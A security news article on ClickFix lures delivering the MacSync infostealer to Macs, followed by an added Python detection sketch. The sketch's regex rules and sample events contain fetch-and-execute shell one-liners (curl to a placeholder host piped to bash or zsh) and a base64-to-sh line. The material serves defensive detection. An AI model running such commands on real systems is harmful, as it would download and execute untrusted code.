ClickFix Social Engineering Delivers MacSync Infostealer On Macs

In recent months, the ClickFix social engineering technique has emerged as a prominent malware distribution method, particularly targeting macOS users. ClickFix relies on user interaction rather than exploiting system vulnerabilities, making it a highly effective attack vector.

The latest observed trend involves MacSync, an infostealer malware, delivered through this method.

Over the past three months, several campaigns leveraging ClickFix have been observed, showing how attackers continuously evolve their tactics to bypass security and harvest sensitive information.

The ClickFix campaign targeting macOS users follows a pattern of luring victims to malicious websites, disguised as legitimate sources.

One of the most notable campaigns began in November 2025, where attackers used Google-sponsored links to advertise a fake OpenAI Atlas browser download, misleading users into thinking they were interacting with a trusted platform.

This bait led to a phishing site that prompted users to run malicious commands in the terminal, a typical ClickFix method. These commands triggered the installation of the MacSync infostealer, which executed with the victim’s permission.

From Lures To Dynamic Payloads

In December 2025, the attackers adjusted their tactics. Instead of redirecting users to a direct download page, they used ChatGPT-themed fake forums to present themselves as helpful guides, tricking users into downloading a malicious script from a GitHub-themed page.

The sponsored result – note that it appears above the legitimate link (Source: Sophos)

This clever tactic made the attack appear more legitimate and bypassed macOS security tools like Gatekeeper and XProtect, which typically block suspicious downloads.

By February 2026, the MacSync infostealer had evolved further. The latest campaign involved a multistage loader system in which the malware first used a shell script to fetch and execute additional payloads in memory.

This version was capable of in-memory execution, meaning the malware could run without leaving traces on the file system, making it harder to detect, as reported by Sophos.

The fake OpenAI/ChatGPT website (Source: Sophos)

The evolution of ClickFix campaigns highlights a concerning trend: attackers are increasingly targeting macOS with sophisticated, multistage malware campaigns.

The shift from direct downloads to dynamic payload execution reflects a deep understanding of the operating system’s security features.

The MacSync infostealer, combined with ClickFix tactics, represents a growing risk for macOS users, especially as the malware increasingly uses legitimate tools and platforms to evade detection.

Users are urged to be cautious when interacting with unfamiliar websites, avoid copying commands from unknown sources, and regularly update their Sophos security software.

Security teams must adapt to this evolving threat landscape by focusing on behavioral detection and enhancing endpoint security monitoring to protect against these sophisticated social engineering attacks.
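
As an added illustration of the behavioral detection recommended above (not code from Sophos or the original article), the following sketch triages process events for shell one-liners that fetch or decode content and hand it straight to an interpreter without writing a file. The rule patterns, the event schema, the list of interactive parent processes and the sample events are all assumptions constructed for this example.

```python
import re

# Generic "fetch or decode, then hand straight to an interpreter" patterns.
# Chosen for this example; they are not indicators from the Sophos report.
FETCH = r"\b(?:curl|wget)\b"
INTERP = r"(?:sudo\s+)?(?:(?:ba|z)?sh|osascript|python3?)\b"
RULES = {
    "fetch_piped_to_interpreter": re.compile(FETCH + r"[^|;]*\|\s*" + INTERP),
    "decode_piped_to_interpreter": re.compile(
        r"\bbase64\s+(?:-d|-D|--decode)\b[^|;]*\|\s*" + INTERP),
    "interpreter_runs_fetched_text": re.compile(
        r"\b(?:(?:ba|z)?sh\s+-c|eval)\s+[\"']?\$\(\s*" + FETCH),
}
# Parents that suggest the command was typed or pasted by a person (assumed list).
INTERACTIVE_PARENTS = {"Terminal", "iTerm2"}

def match_rules(cmdline):
    """Return the sorted names of every rule the command line matches."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def triage(events):
    """Return one finding per event that matches a rule, most suspicious first."""
    findings = []
    for ev in events:
        rules = match_rules(ev["cmdline"])
        if rules:
            findings.append({"pid": ev["pid"], "rules": rules,
                             "pasted_likely": ev["parent"] in INTERACTIVE_PARENTS})
    # Interactive-parent hits sort first: that is the ClickFix paste-and-run shape.
    return sorted(findings, key=lambda f: (not f["pasted_likely"], f["pid"]))

# Constructed process events (hypothetical schema, not output from a real EDR).
SAMPLE_EVENTS = [
    {"pid": 101, "parent": "Terminal", "cmdline": "brew install wget"},
    {"pid": 102, "parent": "Terminal",
     "cmdline": '/bin/zsh -c "curl -fsSL https://example.invalid/install.sh | bash"'},
    {"pid": 103, "parent": "launchd",  # the encoded text is just "echo hi"
     "cmdline": "echo ZWNobyBoaQ== | base64 -D | sh"},
    {"pid": 104, "parent": "Terminal",
     "cmdline": "curl -s https://example.invalid/api | jq ."},
    {"pid": 105, "parent": "iTerm2",
     "cmdline": 'zsh -c "$(curl -fsSL https://example.invalid/setup)"'},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Ordinary downloads and pipes into non-interpreters (events 101 and 104) are not flagged, which keeps the heuristic focused on execution of fetched content rather than on network tools in general.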

The post ClickFix Social Engineering Delivers MacSync Infostealer On Macs appeared first on Cyber Security News.

